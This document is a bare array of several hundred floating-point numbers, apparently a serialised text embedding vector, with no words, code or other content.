[ -0.03497081622481346, -0.015347828157246113, -0.0054971445351839066, -0.008585948497056961, 0.023442132398486137, -0.022487346082925797, -0.009697490371763706, 0.025793470442295074, -0.006943573709577322, -0.0006964949425309896, -0.01932372711598873, 0.004485356155782938, -0.004528108052909374, 0.02120479755103588, 0.01875370554625988, 0.058541204780340195, -0.020919786766171455, -0.005422329064458609, 0.02163231372833252, 0.030581651255488396, -0.009234347380697727, -0.007310525048524141, -0.01959448680281639, 0.03511332347989082, 0.011792318895459175, 0.006473306100815535, 0.00043575468589551747, 0.019665740430355072, -0.042894113808870316, 0.011272174306213856, 0.030809659510850906, 0.01081615686416626, 0.0372794046998024, 0.03907497227191925, 0.039901502430438995, -0.005112379789352417, 0.017399905249476433, 0.022302089259028435, -0.027133021503686905, -0.03371676802635193, -0.04905034601688385, -0.06150531396269798, -0.003557290183380246, 0.01718614622950554, -0.013758893124759197, 0.017314402386546135, 0.0045067323371768, -0.02984062395989895, -0.008999213576316833, 0.0049199978820979595, -0.024909937754273415, -0.04796730726957321, -0.04836631938815117, -0.07045464962720871, 0.013224497437477112, -0.02262985147535801, 0.03440079465508461, 0.013894272968173027, 0.02020725980401039, -0.000819405831862241, -0.003779954742640257, 0.012511971406638622, 0.04648524895310402, 0.033118247985839844, 0.005237072240561247, 0.04346413537859917, 0.0013618168886750937, 0.028600826859474182, -0.04084203764796257, -0.023057367652654648, -0.01407240517437458, -0.003755016252398491, 0.012276837602257729, 0.019850997254252434, 0.03793492913246155, -0.02308586984872818, 0.07148069143295288, 0.036338869482278824, -0.0013030334375798702, 0.021874573081731796, -0.01909571886062622, 0.0408705398440361, -0.02193157561123371, 0.0016441555926576257, 0.03437229245901108, -0.003779954742640257, -0.04893634095788002, -0.06486844271421432, 0.008407816290855408, -0.01390139851719141, -0.011307801119983196, -0.01229108776897192, -0.012006076984107494, -0.06714852899312973, 0.02140430547297001, -0.03129417821764946, 0.009569235146045685, -0.01242646761238575, -0.026049980893731117, -0.004446167498826981, -0.011514433659613132, 0.024168910458683968, -0.02002200298011303, 0.0173714030534029, 0.05167244374752045, 0.027289777994155884, 0.0011489494936540723, 0.018938962370157242, 0.002923141233623028, 0.1374891698360443, 0.028216062113642693, -0.011699690483510494, -0.04249509796500206, 0.00643411697819829, -0.03129417821764946, 0.024382667616009712, -0.00537957763299346, -0.004577985033392906, 0.0015675589675083756, 0.0009057997376658022, -0.007331901229918003, -0.0028322942089289427, 0.013017864897847176, -0.025750719010829926, -0.017328651621937752, 0.009312725625932217, 0.0009939749725162983, 0.01487755961716175, -0.03827694058418274, -0.010673651471734047, -0.003177869599312544, 0.009433855302631855, -0.04115555062890053, -0.010873159393668175, 0.012690102681517601, 0.016274113208055496, 0.010331639088690281, 0.023484883829951286, -0.02823031321167946, 0.028087807819247246, -0.0028233875054866076, -0.014414417557418346, 0.014093780890107155, 0.0022230837494134903, 0.0032704980112612247, -0.006462618242949247, 0.01825493760406971, -0.0059460364282131195, -0.02630648948252201, -0.01173531636595726, -0.004410541150718927, 0.014763555489480495, 0.03254822641611099, 0.032348718494176865, 0.07854896038770676, -0.03440079465508461, 0.027774294838309288, 0.01412940677255392, 0.025551211088895798, 0.0026791009586304426, 0.013324251398444176, -0.045459210872650146, -0.00749578233808279, -0.01014638226479292, 0.01077340543270111, 0.03930297866463661, 0.017699167132377625, -0.0016201079124584794, -0.029042594134807587, 0.025394456461071968, 0.010189133696258068, -0.023185621947050095, 0.03061015158891678, -0.019694240763783455, -0.027475034818053246, -0.03374527022242546, 0.012440718710422516, 0.028087807819247246, 0.020349765196442604, -0.015376328490674496, -0.015347828157246113, 0.009733116254210472, -0.06680651754140854, -0.0023744956124573946, 0.007046890445053577, -0.01112254336476326, 0.02017875947058201, -0.003327500307932496, 0.020449519157409668, -0.028287315741181374, -0.007445905357599258, 0.0008496882510371506, -0.007488656789064407, -0.0408705398440361, -0.02265835367143154, 0.04392015188932419, -0.0025829097721725702, -0.03177869692444801, 0.0434071347117424, -0.0053439512848854065, 0.030325140804052353, 0.042780108749866486, -0.020962538197636604, -0.004549483768641949, -0.02374139428138733, 0.029213599860668182, 0.009049090556800365, -0.009562109597027302, 0.007502907421439886, -0.019067218527197838, -0.037906426936388016, -0.010994289070367813, 0.017670664936304092, -0.0067939432337880135, 0.012112955562770367, 0.003801330691203475, -0.0063949283212423325, 0.0048629953525960445, -0.03554083779454231, -0.0028251688927412033, 0.03716539964079857, -0.007403153460472822, 0.0029854874592274427, 0.005169382318854332, -0.042238589376211166, 0.0016183265252038836, 0.018782207742333412, -0.0071680196560919285, 0.012048828415572643, -0.03394477814435959, -0.013302875682711601, -0.02262985147535801, 0.007830670103430748, 0.005493581760674715, -0.023299627006053925, -0.02642049454152584, 0.0009886309271678329, -0.009077591821551323, 0.004100591875612736, 0.009654738008975983, 0.00609922967851162, 0.013459631241858006, -0.010153506882488728, 0.01351663377135992, -0.0021464871242642403, 0.03548383712768555, -0.004884371533989906, 0.036908891052007675, 0.0009877403499558568, 0.026391994208097458, -0.0322062112390995, 0.04238109663128853, 0.009063340723514557, -0.01482055801898241, -0.010566772893071175, -0.009790118783712387, -0.01541908085346222, 0.0037087020464241505, 0.01714339479804039, 0.005087441299110651, 0.060992296785116196, 0.01943773217499256, -0.013502383604645729, 0.01687263511121273, 0.029555613175034523, -0.02290061116218567, -0.01442154310643673, 0.019679991528391838, 0.004934248048812151, -0.016245611011981964, -0.009362602606415749, -0.035455334931612015, -0.007417404092848301, -0.00017189708887599409, 0.018425943329930305, 0.003646356053650379, 0.03608235716819763, 0.03713689744472504, 0.013238748535513878, -0.01625986211001873, 0.003947398625314236, -0.004097029101103544, 0.002994393929839134, 0.008037302643060684, -0.004724052734673023, 0.008393566124141216, -0.007730916142463684, -0.055776599794626236, 0.00732477568089962, -0.0060921041294932365, -0.03499931842088699, -0.01660187542438507, -0.011521558277308941, -0.005155131686478853, 0.010730654001235962, 0.035341329872608185, 0.004207470919936895, 0.037792421877384186, -0.019779745489358902, 0.0061170426197350025, -0.027831297367811203, 0.0023744956124573946, 0.00937685277312994, 0.0021714253816753626, -0.033232249319553375, 0.009690364822745323, -0.0335172601044178, 0.07273473590612411, -0.019722742959856987, -0.010338764637708664, 0.009298475459218025, -0.04152606427669525, 0.007780793122947216, -0.02961261384189129, 0.00818693358451128, 0.001408131094649434, 0.02113354578614235, -0.01920972391963005, 0.007221459411084652, -0.00655880942940712, 0.019352229312062263, 0.014621050097048283, -0.04021501541137695, 0.020577775314450264, 0.00989699736237526, -0.060080260038375854, 0.0077522918581962585, -0.010117881000041962, -0.04183957353234291, -0.026106983423233032, -0.03086666204035282, 0.009341226890683174, -0.04275161027908325, -0.023228375241160393, -0.0420960858464241, 0.005796405486762524, -0.011550059542059898, 0.029926126822829247, 0.0422670915722847, 0.004018651321530342, -0.004218158777803183, -0.010003876872360706, -0.006544558797031641, 0.006337926257401705, 0.012248336337506771, -0.00824393518269062, -0.008756954222917557, 0.01664462685585022, 0.02972661890089512, -0.01764216460287571, 0.0009672551532275975, 0.036566875874996185, 0.0033631266560405493, -0.0013270812341943383, 0.030467646196484566, -0.007417404092848301, -0.004456855356693268, -0.0010028815595433116, 0.01137192826718092, -0.01154293492436409, 0.04240959510207176, -0.03847644850611687, -0.008436317555606365, 0.0621323399245739, -0.043891653418540955, 0.01229108776897192, -0.0012442499864846468, -0.005112379789352417, -0.020877035334706306, -0.04483218863606453, -0.04537370800971985, -0.019067218527197838, 0.013053491711616516, 0.010395766235888004, -0.0026203172747045755, -0.01710064336657524, -0.013203121721744537, 0.026391994208097458, -0.045573215931653976, 0.03440079465508461, -0.01771341636776924, 0.038447946310043335, -0.005860533099621534, -0.026562999933958054, 0.014165033586323261, 0.02642049454152584, 0.02512369491159916, 0.03847644850611687, 0.005814218893647194, -0.0013021427439525723, -0.034144286066293716, 0.06503944844007492, -0.007909047417342663, -0.032576724886894226, -0.01571834087371826, 0.022458845749497414, -0.024439670145511627, -0.028586575761437416, 0.03206370770931244, 0.004374914802610874, 0.018197935074567795, 0.039017967879772186, 0.0009000104619190097, 0.01882495917379856, -0.022059829905629158, 0.02331387810409069, -0.015575836412608624, -0.050332896411418915, 0.00582134397700429, -0.02535170502960682, 0.003651699982583523, -0.014001152478158474, -0.013267249800264835, -0.0022444594651460648, 0.062417350709438324, 0.0933695137500763, 0.037222400307655334, 0.013744642026722431, -0.0007998113869689405, 0.040899038314819336, 0.020335515961050987, -0.009676114656031132, 0.03243422135710716, 0.039131972938776016, -0.008906585164368153, 0.038105934858322144, 0.013815894722938538, 0.04486068710684776, 0.06093529239296913, 0.003569759428501129, -0.016730129718780518, -0.018924713134765625, 0.019779745489358902, -0.027973802760243416, -0.003341750707477331, 0.01204170286655426, 0.002379839541390538, -0.03847644850611687, 0.01948048360645771, 0.0005548802437260747, -0.011778068728744984, 0.007837794721126556, -0.026862261816859245, 0.0022355529945343733, -0.027717294171452522, -0.01637386716902256, -0.02535170502960682, -0.024639178067445755, -0.009868496097624302, -0.04041451960802078, -0.051330432295799255, 0.006516057997941971, -0.011607062071561813, 0.00394027354195714, -0.012939486652612686, 0.009120343253016472, 0.0032117145601660013, -0.04215308651328087, 0.04657075181603432, 0.020535023882985115, -0.002442185766994953, 0.019394980743527412, -0.004271598532795906, -0.005076753441244364, 0.013780268840491772, -0.000015238611013046466, -0.013794519007205963, -0.05406653508543968, 0.025023942813277245, -0.018611200153827667, 0.024211661890149117, 0.024183159694075584, 0.04007250815629959, 0.021390054374933243, -0.02335662953555584, 0.04959186539053917, 0.011072666384279728, -0.004442604724317789, -0.0072250221855938435, 0.009269974194467068, -0.018397442996501923, 0.01420778501778841, 0.004777492489665747, -0.01898171380162239, 0.015632838010787964, -0.03337475657463074, -0.02186032384634018, 0.02070602960884571, -0.029441608116030693, -0.05512107536196709, 0.035569339990615845, -0.04383464902639389, -0.024710429832339287, -0.03784942626953125, -0.0008412269526161253, -0.0037585790269076824, 0.022074081003665924, -0.0065481215715408325, 0.06635049730539322, 0.01246209442615509, -0.008464818820357323, 0.002753916196525097, 0.019223973155021667, -0.024382667616009712, 0.0025080943014472723, -0.01530507579445839, -0.03306124359369278, 0.038134437054395676, 0.005347513593733311, -0.004211033694446087, -0.010972913354635239, 0.010117881000041962, 0.03294723853468895, -0.04072803258895874, 0.014328914694488049, -0.006968512199819088, 0.03385927528142929, -0.012405091896653175, -0.002933829091489315, -0.014977313578128815, -0.02634924277663231, -0.03260522708296776, 0.018853459507226944, 0.0168013833463192, -0.000563786830753088, 0.018953213468194008, 0.025750719010829926, 0.015176821500062943, -0.014749305322766304, -0.012925236485898495, 0.027859799563884735, 0.004955624230206013, -0.019223973155021667, 0.006555246654897928, -0.02228783816099167, 0.01129355002194643, -0.012469219043850899, -0.010174882598221302, -0.017114894464612007, -0.02327112667262554, -0.017428405582904816, 0.04497469216585159, -0.02592172659933567, -0.01871095411479473, -0.024097656831145287, 0.04813831299543381, -0.0071430811658501625, 0.013801644556224346, 0.025836221873760223, -0.03770691901445389, 0.029099594801664352, -0.007681039161980152, 0.00396877434104681, 0.00884245801717043, -0.0005388483987189829, -0.03166469186544418, 0.02385539747774601, 0.02964111603796482, 0.006074291188269854, -0.018169434741139412, 0.0012754229828715324, -0.016559123992919922, -0.0048950593918561935, -0.0470837727189064, 0.002495625289157033, -0.016003351658582687, -0.02691926248371601, 0.013680514879524708, -0.0016503902152180672, 0.0036944516468793154, 0.0038476448971778154, -0.011920574121177197, 0.0033381881657987833, -0.013794519007205963, 0.007071828935295343, 0.02807355672121048, 0.012070204131305218, -0.014350290410220623, -0.01687263511121273, 0.007951799780130386, -0.008044428192079067, 0.0013903179205954075, -0.012533347122371197, 0.005158693995326757, 0.02462492696940899, 0.007958924397826195, -0.0022319902200251818, 0.003430816577747464, -0.014165033586323261, -0.004492481704801321, -0.005671713501214981, 0.007282024249434471, 0.014678052626550198, 0.0014865091070532799, 0.03363126516342163, 0.017057891935110092, 0.00832231342792511, -0.007282024249434471, -0.0028714830987155437, -0.00824393518269062, 0.011101167649030685, 0.01541908085346222, 0.02929910272359848, -0.04694126546382904, 0.013509508222341537, 0.02063477598130703, -0.012440718710422516, 0.017271650955080986, -0.04141205921769142, 0.005390265490859747, -0.01997925154864788, 0.005643212236464024, 0.028586575761437416, -0.04648524895310402, 0.027204273268580437, 0.0009779430693015456, 0.013979775831103325, 0.015404829755425453, 0.006052915472537279, 0.021689316257834435, -0.008543197065591812, -0.017328651621937752, 0.044547177851200104, -0.011799444444477558, 0.03197820484638214, -0.009918373078107834, 0.019223973155021667, -0.006241735070943832, -0.002164300298318267, 0.004542358685284853, 0.0013867553789168596, 0.012348090298473835, -0.009775867685675621, -0.021874573081731796, -0.03847644850611687, -0.0048879338428378105, -0.02124754898250103, 0.0033364067785441875, -0.02714727260172367, 0.00971886608749628, -0.005333263427019119, 0.013153244741261005, -0.03462880477309227, 0.07216471433639526, -0.019665740430355072, 0.02247309684753418, -0.026491748169064522, 0.01963724009692669, 0.013445381075143814, 0.023912400007247925, -0.0027735107578337193, 0.020392518490552902, -0.01920972391963005, 0.033574264496564865, 0.016445118933916092, 0.0038832712452858686, 0.044433172792196274, 0.01598910242319107, -0.029128096997737885, -0.01068077702075243, -0.030581651255488396, -0.034001778811216354, -0.017585162073373795, -0.016288362443447113, -0.007745166774839163, -0.014720804058015347, 0.0003918897418770939, 0.0013983339304104447, 0.00022644993441645056, 0.04320762678980827, -0.03072415664792061, 0.010310263372957706, -0.019565986469388008, 0.004207470919936895, -0.00872132834047079, -0.00017334442236460745, -0.007531408686190844, 0.018311940133571625, 0.003836957039311528, -0.00959061086177826, -0.015276575461030006, -0.010260386392474174, -0.034001778811216354, 0.01918122172355652, -0.019152721390128136, 0.00793754868209362, -0.003598260460421443, 0.0029249226208776236, 0.01132917683571577, -0.020720280706882477, -0.0019166971324011683, -0.01836894080042839, 0.011079791933298111, -0.029584113508462906, 0.02941310778260231, -0.041013043373823166, 0.01710064336657524, -0.009847120381891727, -0.003610729705542326, 0.005062503274530172, -0.007157331798225641, 0.02339938096702099, -0.007178707513958216, 0.04782480001449585, 0.04206758365035057, 0.014621050097048283, 0.007681039161980152, 0.01060239877551794, 0.00002084697553073056, 0.02998312935233116, -0.02941310778260231, -0.020421018823981285, -0.014692302793264389, 0.031351178884506226, 0.006448367610573769, 0.008436317555606365, 0.016017602756619453, 0.012996489182114601, -0.01482055801898241, 0.0075741601176559925, -0.015077067539095879, -0.010117881000041962, -0.014321789145469666, -0.04141205921769142, -0.0409560427069664, 0.0016058572800830007, 0.010388640686869621, -0.01952323503792286, 0.009882747195661068, 0.011514433659613132, 0.03249122202396393, -0.015362078323960304, 0.00701838918030262, 0.016316864639520645, -0.0008113899384625256, 0.016616124659776688, 0.009255723096430302, -0.02508094348013401, 0.03340325877070427, -0.02040676772594452, -0.0011952636996284127, -0.044433172792196274, 0.037792421877384186, -0.025665216147899628, 0.025380205363035202, -0.031351178884506226, 0.010616649873554707, -0.004467543214559555, -0.009597736410796642, 0.022487346082925797, 0.04115555062890053, -0.007873421534895897, -0.01963724009692669, -0.026705505326390266, 0.01050977036356926, 0.012725729495286942, 0.006993450690060854, 0.011136794462800026, 0.02190307527780533, -0.003306124359369278, 0.022444594651460648, 0.03226321563124657, -0.011478806845843792, 0.017328651621937752, 0.01844019442796707, -0.005397390574216843, -0.016060354188084602, -0.027631789445877075, 0.003804893232882023, -0.014065279625356197, -0.019223973155021667, 0.007695289794355631, -0.032918740063905716, -0.006879446562379599, -0.00920584611594677, 0.00181961536873132, 0.007249960210174322, 0.015005814842879772, 0.017385654151439667, 0.011229422874748707, -0.036025356501340866, 0.006608686409890652, -0.012419342063367367, -0.0022854297421872616, -0.060878291726112366, -0.0007178707746788859, 0.008557447232306004, -0.002598941558972001, -0.0027628226671367884, 0.017884423956274986, -0.028814584016799927, 0.0016201079124584794, 0.016316864639520645, -0.010431393049657345, 0.024183159694075584, -0.013024990446865559, -0.01426478661596775, 0.0037835175171494484, -0.032006703317165375, -0.007923298515379429, 0.012775605544447899, 0.019965002313256264, -0.0065908730030059814, 0.0217035673558712, -0.008920836262404919, -0.02251584827899933, -0.005507832393050194, -0.021261800080537796, -0.030154135078191757, -0.00009496646816842258, -0.0019950750283896923, 0.0002440404350636527, -0.021945826709270477, 0.03052464872598648, 0.02063477598130703, -0.010573898442089558, -0.00312621146440506, 0.017000889405608177, -0.000653743336442858, 0.00409346679225564, 0.009134593419730663, 0.0035145385190844536, -0.0055648344568908215, -0.0008683920605108142, 0.015775343403220177, 0.0018347565783187747, -0.006270235870033503, 0.004449729807674885, 0.02492418885231018, 0.013787394389510155, 0.010353014804422855, 0.011357677169144154, -0.015533084981143475, 0.02204558067023754, -0.045231204479932785, 0.012604599818587303, 0.019195472821593285, -0.01940922997891903, -0.02006475441157818, 0.021375805139541626, 0.030125634744763374, 0.002011107048019767, -0.007588410750031471, -0.013972651213407516, 0.01748540811240673, -0.02104804292321205, -0.03451479971408844, -0.008008801378309727, 0.014749305322766304, -0.002164300298318267, -0.019010215997695923, -0.0020182321313768625, -0.01691538654267788, 0.010709278285503387, -0.0042680357582867146, -0.01909571886062622, 0.024054905399680138, -0.008571697399020195, -0.016587624326348305, -0.013666264712810516, 0.020563524216413498, 0.022886361926794052, 0.001269188360311091, 0.015860846266150475, 0.002867920557036996, 0.019651489332318306, 0.02964111603796482, -0.01603185385465622, -0.006519620306789875, -0.0013627075823023915, -0.009704614989459515, 0.021489808335900307, -0.004000837914645672, -0.001780426362529397, -0.00540807843208313, -0.011357677169144154, 0.006526745855808258, -0.004802430979907513, 0.011364802718162537, -0.0015399486292153597, -0.008080054074525833, 0.0010527584236115217, -0.013937024399638176, 0.017998427152633667, 0.03716539964079857, -0.001395661965943873, 0.004218158777803183, -0.023228375241160393, 0.016088856384158134, -0.018311940133571625, -0.00828668661415577, -0.012191333808004856, -0.01832618936896324, -0.030211137607693672, 0.03155068680644035, 0.01791292428970337, -0.009191595949232578, -0.01509131770581007, -0.035683345049619675, -0.015062817372381687, 0.004453292582184076, -0.005799968261271715, -0.011614187620580196, -0.006245297379791737, -0.0078021688386797905, -0.015818094834685326, 0.03083816170692444, 0.003779954742640257, -0.0011774505255743861, -0.0032704980112612247, 0.005265573039650917, -0.05127343162894249, -0.02519494853913784, -0.01814093254506588, -0.026634253561496735, -0.02104804292321205, 0.004225283861160278, 0.01940922997891903, 0.005796405486762524, -0.00014784932136535645, -0.004193220287561417, 0.03297574073076248, -0.03673788160085678, 0.02489568665623665, 0.007702414877712727, -0.009804368950426579, 0.02258710004389286, 0.0016619687667116523, -0.019993502646684647, 0.008863833732903004, -0.019309476017951965, -0.022843610495328903, -0.026990516111254692, -0.0033987530041486025, 0.00458154734224081, -0.011386178433895111, -0.026819510385394096, 0.0016281238058581948, -0.0048950593918561935, -0.03326075151562691, -0.03759291395545006, -0.0152053227648139, 0.010310263372957706, -0.027874048799276352, 0.017471157014369965, 0.0036321054212749004, 0.03628186509013176, -0.012996489182114601, -0.014834808185696602, 0.033232249319553375, -0.01856844872236252, 0.00018492297385819256, 0.002372714225202799, -0.006227484438568354, -0.010060878470540047, 0.006398491095751524, -0.03192120045423508, -0.021418556571006775, -0.020007753744721413, -0.0041077169589698315, -0.009291349910199642, -0.017542410641908646, 0.015789594501256943, -0.010730654001235962, 0.01373039186000824, 0.027318278327584267, -0.009562109597027302, -0.002688007429242134, 0.022786607965826988, -0.001728768227621913, 0.008564572781324387, 0.01993650011718273, 0.005383139941841364, 0.024211661890149117, 0.02898559160530567, -0.005518520250916481, 0.02458217553794384, 0.0025009692180901766, 0.017941424623131752, -0.008471944369375706, 0.011243673041462898, -0.008350814692676067, 0.025323202833533287, 0.006690626963973045, 0.019466232508420944, -0.02158956229686737, -0.028629327192902565, 0.032804735004901886, -0.040557026863098145, -0.014300413429737091, 0.03705139458179474, 0.022002827376127243, -0.00501262629404664, -0.02404065430164337, 0.015290825627744198, -0.02389814890921116, 0.023983653634786606, -0.017670664936304092, -0.02385539747774601, -0.025251951068639755, -0.030097132548689842, 0.026791008189320564, 0.019580237567424774, 0.020079005509614944, -0.0005415203631855547, 0.013060616329312325, 0.010125006549060345, -0.0011338082840666175, -0.007909047417342663, -0.04352113977074623, -0.01779891923069954, 0.010880284942686558, 0.013972651213407516, -0.014678052626550198, -0.03098066709935665, -0.006815318949520588, 0.010210509411990643, -0.004257347900420427, -0.002728977706283331, 0.00571446493268013, -0.028358567506074905, 0.00014183737221173942, -0.027660291641950607, 0.013637763448059559, 0.0005054487264715135, 0.018924713134765625, -0.019052967429161072, 0.004389165434986353, 0.003983024973422289, -0.007816419005393982, -0.01129355002194643, 0.002741446951404214, 0.008158432319760323, -0.020891286432743073, 0.010866033844649792, -0.020221510902047157, 0.007128830999135971, -0.033460259437561035, -0.04508869722485542, 0.039901502430438995, 0.0372794046998024, 0.012141456827521324, -0.022843610495328903, -0.011706816032528877, -0.008087179623544216, 0.01355938520282507, 0.0003829831548500806, -0.007837794721126556, -0.010381516069173813, -0.042124584317207336, 0.01290386077016592, -0.004050714895129204, 0.02136155404150486, 0.004068528302013874, -0.025380205363035202, 0.00773804122582078, 0.005187195260077715, -0.0168013833463192, 0.003254466224461794, 0.004314349964261055, -0.005162256769835949, 0.008386440575122833, -0.02462492696940899, -0.025608213618397713, -0.00732477568089962, 0.0003558180760592222, 0.015590086579322815, 0.0011240111198276281, 0.025095194578170776, -0.001932729035615921, -0.0035555087961256504, 0.02032126486301422, 0.005016188602894545, -0.009212971664965153, -0.0038262689486145973, -0.0015150101389735937, 0.023071618750691414, -0.006893697194755077, -0.011443180963397026, -0.016744380816817284, -0.01256184745579958, 0.0016797819407656789, 0.0026844448875635862, 0.0027752919122576714, -0.023142870515584946, -0.02365589141845703, -0.02374139428138733, -0.009326975792646408, 0.03653837367892265, 0.008272436447441578, -0.025280451402068138, 0.018653951585292816, 0.0032811861019581556, -0.034457795321941376, -0.00989699736237526, -0.03448629751801491, 0.013659139163792133, 0.0971316546201706, -0.009611986577510834, 0.01482055801898241, 0.013231622986495495, 0.024567924439907074, -0.006220359355211258, 0.021375805139541626, 0.023755643516778946, 0.027090270072221756, -0.001010897452943027, 0.03405878320336342, -0.010958662256598473, 0.021162046119570732, 0.015903599560260773, -0.006687064189463854, 0.014008277095854282, -0.03308974578976631, -0.021831821650266647, 0.011450305581092834, 0.014328914694488049, -0.011265048757195473, -0.011115418747067451, -0.031693194061517715, -0.007545658852905035, 0.00540807843208313, -0.001870382926426828, -0.008821082301437855, -0.028928589075803757, 0.02535170502960682, 0.00841494183987379, 0.004367789253592491, -0.017898673191666603, 0.0111581701785326, -0.020007753744721413, 0.018041178584098816, 0.014834808185696602, 0.02673400565981865, -0.026791008189320564, 0.010880284942686558, -0.025066694244742393, -0.012576098553836346, -0.005628962069749832, 0.00029124534921720624, 0.02764604054391384, -0.014336039312183857, -0.03283323720097542, -0.03927448019385338, 0.006156231742352247, -0.016587624326348305, -0.010673651471734047, 0.01702939160168171, -0.02492418885231018, 0.008215433917939663, 0.028087807819247246, -0.02154681086540222, 0.005422329064458609, -0.00855032168328762, -0.004004400689154863, -0.017656413838267326, 0.025479959324002266, -0.015119818970561028, 0.01598910242319107, -0.014920311979949474, 0.012169958092272282, -0.014963063411414623, 0.012226960621774197, 0.0067262533120810986, -0.005016188602894545, 0.005646775010973215, -0.0008924398571252823, 0.035882849246263504, 0.007410279009491205, 0.00016788912762422115, 0.010060878470540047, 0.0057429661974310875, 0.005600460804998875, 0.00941247958689928, -0.0050660655833780766, 0.010260386392474174, -0.012960863299667835, -0.007652537897229195, -0.006733378395438194, -0.015233823098242283, -0.0018935400294139981, 0.012576098553836346, 0.0019754806999117136, -0.03408728167414665, 0.0014499920653179288, 0.04175407066941261, -0.0033649078104645014, 0.03075265698134899, 0.03796342760324478, 0.006950699258595705, 0.010167757980525494, -0.00013604809646494687, 0.008265310898423195, -0.02265835367143154, 0.007011264096945524, -0.011863571591675282, -0.018625451251864433, -0.008272436447441578, 0.01526232436299324, 0.010787656530737877, 0.00828668661415577, -0.012925236485898495, 0.0038512074388563633, 0.026748256757855415, 0.02059202454984188, -0.007285586558282375, 0.024610675871372223, -0.019537486135959625, -0.004602923057973385, 0.006391365546733141, -0.011322051286697388, -0.019451981410384178, 0.019038716331124306, 0.015490333549678326, -0.010402891784906387, 0.02319987304508686, -0.012269712053239346, -0.023869648575782776, -0.019651489332318306, -0.00989699736237526, -0.00307277194224298, 0.010965787805616856, 0.02262985147535801, 0.003637449350208044, 0.0018614763393998146, 0.01768491603434086, 0.041782572865486145, 0.0006176716997288167, 0.0235418863594532, 0.017399905249476433, 0.004610048606991768, -0.01351663377135992, 0.014621050097048283, -0.0015666683902963996, 0.01351663377135992, -0.012319589033722878, -0.007075391244143248, -0.020307013764977455, 0.030268140137195587, -0.034913815557956696, 0.005422329064458609, -0.011357677169144154, -0.007339026313275099, -0.008913710713386536, 0.021504059433937073, 0.023000365123152733, 0.0016922511858865619, 0.002607848262414336, -0.016046104952692986, 0.023598888888955116, -0.010360140353441238, -0.02220233529806137, -0.007510032504796982, 0.01583234593272209, -0.002385183470323682, 0.0049627493135631084, -0.005621836520731449, 0.03192120045423508, -0.022002827376127243, 0.003598260460421443, 0.01050977036356926, 0.01093016192317009, 0.004998375661671162, -0.022715354338288307, -0.035455334931612015, -0.006551684346050024, 0.0002899093378800899, -0.0037692668847739697, 0.006430554669350386, -0.008464818820357323, 0.025109445676207542, -0.00507319113239646, 0.017471157014369965, -0.013017864897847176, 0.005589772947132587, 0.027047518640756607, 0.006106354761868715, -0.023114370182156563, -0.004000837914645672, 0.005903284531086683, 0.0003696233034133911, 0.010281762108206749, 0.016901135444641113, 0.008728453889489174, 0.017342902719974518, -0.023769894614815712, -0.01825493760406971, 0.0021197672467678785, 0.024339916184544563, -0.0037336405366659164, -0.01979399472475052, 0.019280975684523582, 0.024439670145511627, -0.028201811015605927, -0.012454968877136707, 0.020378267392516136, -0.02911384589970112, 0.012177083641290665, -0.02063477598130703, -0.011706816032528877, 0.0009182689245790243, -0.01764216460287571, -0.017941424623131752, 0.006056477781385183, -0.012169958092272282, -0.0034539736807346344, 0.018283437937498093, 0.017114894464612007, -0.013530883938074112, -0.008258186280727386, -0.006679939106106758, 0.0006813537911511958, 0.007403153460472822, 0.006455493159592152, -0.014393041841685772, 0.009298475459218025, -0.04010101035237312, -0.008521820418536663, 0.021846072748303413, 0.010139256715774536, 0.004289411474019289, 0.02297186478972435, 0.03075265698134899, 0.01625986211001873, -0.01882495917379856, 0.01868245378136635, 0.01607460528612137, 0.006366427056491375, -0.01587509736418724, -0.006822444498538971, -0.0027699479833245277, -0.008607324212789536, -0.016445118933916092, 0.020463770255446434, 0.01913847029209137, -0.002408340573310852, 0.016003351658582687, 0.0033880651462823153, -0.013302875682711601, 0.005764341913163662, -0.03086666204035282, -0.008265310898423195, -0.00023223921016324311, -0.006893697194755077, -0.025722218677401543, -0.02369864284992218, 0.019622988998889923, 0.005906847305595875, -0.020691778510808945, -0.012148582376539707, -0.014250536449253559, -0.013131869025528431, 0.017385654151439667, 0.0029124533757567406, 0.02312862128019333, 0.01660187542438507, -0.0015452925581485033, -0.0037372030783444643, -0.02952711097896099, 0.015518833883106709, 0.008144181221723557, -0.00628092372789979, 0.04061402752995491, -0.005931785795837641, -0.002203489188104868, 0.0048629953525960445, -0.00879970658570528, 0.011094043031334877, -0.0005660135066136718, 0.007510032504796982, -0.002240896923467517, -0.01503431610763073, 0.01142892986536026, 0.013146120123565197, -0.023527635261416435, -0.013880022801458836, -0.009212971664965153, -0.01290386077016592, 0.0173714030534029, -0.010588148608803749, -0.04967736825346947, 0.02750353515148163, -0.0279168002307415, -0.03251972422003746, -0.013452506624162197, -0.010659401305019855, 0.005133755970746279, -0.01442154310643673, 0.006156231742352247, 0.03183569759130478, -0.01875370554625988, -0.017228897660970688, 0.0279168002307415, 0.01844019442796707, -0.0073532769456505775, -0.0026327865198254585, -0.002240896923467517, 0.00784492027014494, 0.03497081622481346, 0.014393041841685772, -0.0003520327736623585, -0.02811630815267563, -0.00024047780607361346, 0.005928223021328449, -0.015248074196279049, 0.00784492027014494, -0.004478231072425842, -0.021504059433937073, 0.0020039817318320274, -0.019124219194054604, 0.005208570975810289, -0.013694765977561474, -0.030211137607693672, 0.03542683273553848, -0.001511447480879724, 0.01120092160999775, -0.009583485312759876, -0.013302875682711601, -0.012690102681517601, -0.036908891052007675, -0.001088384771719575, 0.014136532321572304, -0.02503819204866886, 0.017841672524809837, 0.010880284942686558, 0.009775867685675621, -0.024297164753079414, -0.0006907056667841971, 0.014243410900235176, -0.01547608245164156, -0.02753203734755516, -0.01464955136179924, -0.016772881150245667, 0.008949336595833302, 0.019622988998889923, -0.0347428061068058, 0.019067218527197838, -0.021732067689299583, 0.030781159177422523, -0.0029373918659985065, 0.007951799780130386, -0.027560537680983543, -0.012447843328118324, -0.01407240517437458, 0.0173714030534029, -0.017499659210443497, -0.005746528971940279, 0.010823282413184643, 0.016160108149051666, 0.022145332768559456, 0.010830407962203026, -0.003482474945485592, -0.0030193324200809, -0.008030177094042301, 0.026791008189320564, 0.01050977036356926, -0.0016281238058581948, -0.008179808035492897, 0.02623523771762848, -0.008065803907811642, 0.011564310640096664, 0.020948288962244987, 0.016502121463418007, 0.0035519462544471025, 0.009996751323342323, -0.0013083773665130138, -0.017770418897271156, -0.0034949439577758312, -0.008699952624738216, -0.008913710713386536, 0.0040899040177464485, 0.009818620048463345, 0.008058678358793259, 0.009569235146045685, -0.020392518490552902, -0.011799444444477558, 0.014108031056821346, -0.0009779430693015456, -0.04919285327196121, -0.015818094834685326, 0.009996751323342323, -0.028486821800470352, 